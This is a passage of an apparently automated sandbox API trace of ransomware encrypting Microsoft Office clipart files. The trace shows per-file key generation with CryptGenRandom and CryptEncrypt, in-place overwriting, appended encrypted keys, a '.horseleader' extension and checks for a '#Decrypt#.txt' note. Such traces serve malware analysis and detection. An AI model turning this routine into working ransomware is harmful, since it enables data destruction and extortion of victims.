office\\clipart\\pub60cor\\bl00524_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00524_.wmf.horseleader")) returned 1 [0253.573] GetProcessHeap () returned 0x780000 [0253.573] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.573] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd52c3c00, ftCreationTime.dwHighDateTime=0x1bd4af9, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd52c3c00, ftLastWriteTime.dwHighDateTime=0x1bd4af9, nFileSizeHigh=0x0, nFileSizeLow=0x2576, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00525_.WMF", cAlternateFileName="")) returned 1 [0253.574] lstrcmpiW (lpString1="BL00525_.WMF", lpString2="Windows") returned -1 [0253.574] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 67 [0253.574] StrStrIW (lpFirst="BL00525_.WMF", lpSrch=".horseleader") returned 0x0 [0253.574] lstrcmpW (lpString1="BL00525_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.574] lstrcmpW (lpString1="BL00525_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.574] lstrlenW (lpString=".testttjffg") returned 11 [0253.574] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.574] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.574] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.574] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00525_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.575] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF") returned 67 [0253.575] StrStrW (lpFirst="BL00525_.WMF", lpSrch=".txt") returned 0x0 [0253.575] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=9590) returned 1 [0253.575] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2576, lpOverlapped=0x0) returned 1 [0253.581] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffda8a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.581] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2576, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2576, lpOverlapped=0x0) returned 1 [0253.581] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.581] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.581] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.581] CloseHandle (hObject=0x158) returned 1 [0253.581] GetProcessHeap () returned 0x780000 [0253.581] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.581] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF.horseleader") returned 79 [0253.581] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00525_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00525_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00525_.wmf.horseleader")) returned 1 [0253.585] GetProcessHeap () returned 0x780000 [0253.585] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.585] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3fb0f00, ftCreationTime.dwHighDateTime=0x1bd4af9, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd3fb0f00, ftLastWriteTime.dwHighDateTime=0x1bd4af9, nFileSizeHigh=0x0, nFileSizeLow=0x6ba0, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00526_.WMF", cAlternateFileName="")) returned 1 [0253.585] lstrcmpiW (lpString1="BL00526_.WMF", lpString2="Windows") returned -1 [0253.585] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 67 [0253.585] StrStrIW (lpFirst="BL00526_.WMF", lpSrch=".horseleader") returned 0x0 [0253.585] lstrcmpW (lpString1="BL00526_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.585] lstrcmpW (lpString1="BL00526_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.585] lstrlenW (lpString=".testttjffg") returned 11 [0253.585] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.585] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.585] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.585] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00526_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.586] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF") returned 67 [0253.586] StrStrW (lpFirst="BL00526_.WMF", lpSrch=".txt") returned 0x0 [0253.586] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=27552) returned 1 [0253.586] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.590] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.590] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.590] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1ba0, lpOverlapped=0x0) returned 1 [0253.591] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe460, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.591] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1ba0, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1ba0, lpOverlapped=0x0) returned 1 [0253.591] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.591] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.591] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.591] CloseHandle (hObject=0x158) returned 1 [0253.591] GetProcessHeap () returned 0x780000 [0253.591] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.591] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF.horseleader") returned 79 [0253.591] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00526_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00526_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00526_.wmf.horseleader")) returned 1 [0253.593] GetProcessHeap () returned 0x780000 [0253.593] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.593] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20fce500, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x5f7031f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x20fce500, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0x2cec, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00648_.WMF", cAlternateFileName="")) returned 1 [0253.593] lstrcmpiW (lpString1="BL00648_.WMF", lpString2="Windows") returned -1 [0253.593] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 67 [0253.593] StrStrIW (lpFirst="BL00648_.WMF", lpSrch=".horseleader") returned 0x0 [0253.593] lstrcmpW (lpString1="BL00648_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.593] lstrcmpW (lpString1="BL00648_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.593] lstrlenW (lpString=".testttjffg") returned 11 [0253.593] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.593] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.593] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.593] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00648_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.594] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF") returned 67 [0253.594] StrStrW (lpFirst="BL00648_.WMF", lpSrch=".txt") returned 0x0 [0253.594] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=11500) returned 1 [0253.594] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2cec, lpOverlapped=0x0) returned 1 [0253.596] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd314, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.596] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2cec, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2cec, lpOverlapped=0x0) returned 1 [0253.596] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.597] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.597] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.597] CloseHandle (hObject=0x158) returned 1 [0253.597] GetProcessHeap () returned 0x780000 [0253.597] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.597] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF.horseleader") returned 79 [0253.597] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00648_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00648_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00648_.wmf.horseleader")) returned 1 [0253.598] GetProcessHeap () returned 0x780000 [0253.598] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.598] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeba4c700, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xeba4c700, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1138, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00921_.WMF", cAlternateFileName="")) returned 1 [0253.598] lstrcmpiW (lpString1="BL00921_.WMF", lpString2="Windows") returned -1 [0253.598] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 67 [0253.598] StrStrIW (lpFirst="BL00921_.WMF", lpSrch=".horseleader") returned 0x0 [0253.598] lstrcmpW (lpString1="BL00921_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.598] lstrcmpW (lpString1="BL00921_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.598] lstrlenW (lpString=".testttjffg") returned 11 [0253.599] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.599] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.599] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.599] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00921_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.600] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF") returned 67 [0253.600] StrStrW (lpFirst="BL00921_.WMF", lpSrch=".txt") returned 0x0 [0253.600] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4408) returned 1 [0253.600] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1138, lpOverlapped=0x0) returned 1 [0253.603] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffeec8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.603] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1138, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1138, lpOverlapped=0x0) returned 1 [0253.603] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.603] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.603] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.603] CloseHandle (hObject=0x158) returned 1 [0253.603] GetProcessHeap () returned 0x780000 [0253.604] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.604] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF.horseleader") returned 79 [0253.604] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00921_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00921_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00921_.wmf.horseleader")) returned 1 [0253.605] GetProcessHeap () returned 0x780000 [0253.605] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.605] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74832900, ftCreationTime.dwHighDateTime=0x1bd4bf7, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x74832900, ftLastWriteTime.dwHighDateTime=0x1bd4bf7, nFileSizeHigh=0x0, nFileSizeLow=0x1870, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00923_.WMF", cAlternateFileName="")) returned 1 [0253.605] lstrcmpiW (lpString1="BL00923_.WMF", lpString2="Windows") returned -1 [0253.605] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 67 [0253.605] StrStrIW (lpFirst="BL00923_.WMF", lpSrch=".horseleader") returned 0x0 [0253.605] lstrcmpW (lpString1="BL00923_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.605] lstrcmpW (lpString1="BL00923_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.605] lstrlenW (lpString=".testttjffg") returned 11 [0253.605] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.606] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.606] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.606] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00923_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.606] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF") returned 67 [0253.607] StrStrW (lpFirst="BL00923_.WMF", lpSrch=".txt") returned 0x0 [0253.607] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=6256) returned 1 [0253.607] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1870, lpOverlapped=0x0) returned 1 [0253.609] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe790, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.609] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1870, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1870, lpOverlapped=0x0) returned 1 [0253.609] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.609] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.609] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.609] CloseHandle (hObject=0x158) returned 1 [0253.610] GetProcessHeap () returned 0x780000 [0253.610] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.610] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF.horseleader") returned 79 [0253.610] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00923_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00923_.wmf.horseleader")) returned 1 [0253.611] GetProcessHeap () returned 0x780000 [0253.611] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.611] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5f7031f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4c14, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BL00932_.WMF", cAlternateFileName="")) returned 1 [0253.611] lstrcmpiW (lpString1="BL00932_.WMF", lpString2="Windows") returned -1 [0253.611] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned 67 [0253.611] StrStrIW (lpFirst="BL00932_.WMF", lpSrch=".horseleader") returned 0x0 [0253.611] lstrcmpW (lpString1="BL00932_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.611] lstrcmpW (lpString1="BL00932_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.611] lstrlenW (lpString=".testttjffg") returned 11 [0253.611] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.611] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.612] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, 